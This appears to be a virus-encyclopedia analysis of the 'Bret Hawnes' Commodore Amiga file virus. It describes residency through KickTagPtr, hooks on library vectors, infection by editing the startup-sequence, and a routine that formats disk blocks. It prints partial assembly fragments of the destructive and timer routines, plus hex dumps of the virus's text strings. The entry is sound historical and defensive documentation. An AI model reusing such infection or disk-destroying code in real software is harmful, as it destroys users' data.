Introduction
Bret Hawnes is a virus written for the Commodore Amiga. It is a filevirus.
Summary
- Writes itself to unprotected floppy disks while booting
- Stays resident in memory by using KickTagPtr
- Extends the startup-sequence of an inserted disk, writing its filename in the first line
- Has a total length of 2608 bytes
- Alters some operating-system routines:
- OpenLibrary()-vector of exec.library
- OpenWindow()-vector of intuition.library
- $6C (Interrupt-Vector)
- Destroys disk blocks using the trackdisk.device
- It is not encrypted
Details
After executing of the virus it copies itself to ChipRam location $7F000 without allocation of this area. This can crash the Amiga if another programm occupies this memory location.
Then the virus will make itself resident by using the KickTag. When resetting the Amiga the virus will hook the OpenLibrary()-vector of the exec.library
Next time you boot with a clean disk the virus will be activated since the AmigaOS opens various libraries using the hooked OpenLibrary()-vector. The virus waits until the AmigaOS opens the intuition.library (which will be also done at boot-time) then it hooks the OpenWindow()-vector of this library and disables the OpenLibrary()-vector-hook of the exec.library.
The AmigaDOS opens the default AmigaDOS window on each boot by using OpenWindow() of the intuition.library, this means if this Window will be opened the virus gains control again, and this time the following steps will be processed:
- Writes itself to the root folder of the disk by using the filename 0xC0A0E0A01.
- Alters the startup-sequence of the disk by writing the above filename as first line. So next boot the virus will be activated again.
- If this is the 10th disk-infection the virus activates a destructive routine which formats different disk-blocks. After that a graphical routine will be activated showing a virus-text.
- If this is not the 10th disk-infection the virus hooks the $6c interrupt which will increase a counter. If this counter reaches a certain value (in approx. 20 minutes) the a graphical routine will be activated showing a virus-text.
- Then the virus will disable the OpenWindow()-vector-hook by setting it to the original ROM-value again.
This is the interrupt-routine, which activates the graphical-routine:
counter:
addq.l #1,$7F37C
cmpi.l #$EA60,$7F37C ; $EA60 = 60000 -> 1/50sec * 60000 / 60 = 20 minutes
beq.w show_text
(...)
This is the destruction-routine:
destroy:
move.l #$60400,$7F956
move.l #$B,$7F94E
move.l #$1B800,$7F952
bsr.w doio
move.l #0,$7F956
move.l #$2C00,$7F952
bsr.w doio
move.l #9,$7F94E
move.l #0,$7F952
bsr.w doio
(...)
doio:
movem.l d0-a6,-(sp)
movea.l 4.l,a6
lea iostructure,a1
move.w $7F950,$1C(a1)
move.l $7F952,$24(a1)
move.l $7F956,$2C(a1)
move.l $7F95E,$28(a1)
jsr -456(a6)
move.l $20(a1),$7F95A
movem.l (sp)+,d0-a6
rts
This is the graphical output of the virus which will be shown after 20 minutes or after destruction of the disk, it is a blue screen with small white letters:
At the beginning of the virus-file you can read the following text:
00000000h: 60 00 00 18 42 52 45 54 20 48 41 57 4E 45 53 20 ; `...BRET HAWNES
00000010h: 50 52 4F 44 55 43 54 49 4F 4E 2C 79 00 00 00 04 ; PRODUCTION,y....
And at the end of the virus-file you can read:
000009b0h: FE D6 60 00 FA 02 55 20 4C 49 4B 45 20 4D 59 20 ; þÖ`.ú.U LIKE MY
000009c0h: 46 49 52 53 54 20 4C 49 4E 4B 56 49 52 55 53 20 ; FIRST LINKVIRUS
000009d0h: 3F 20 20 20 20 44 4F 4E 45 20 42 59 20 42 52 45 ; ? DONE BY BRE
000009e0h: 54 20 48 41 57 4E 45 53 20 32 31 30 32 39 30 00 ; T HAWNES 210290.
Clones and variants
1 This filename appears invisible for the AmigaDOS when listing the contents of a disk by using the CLI command dir.
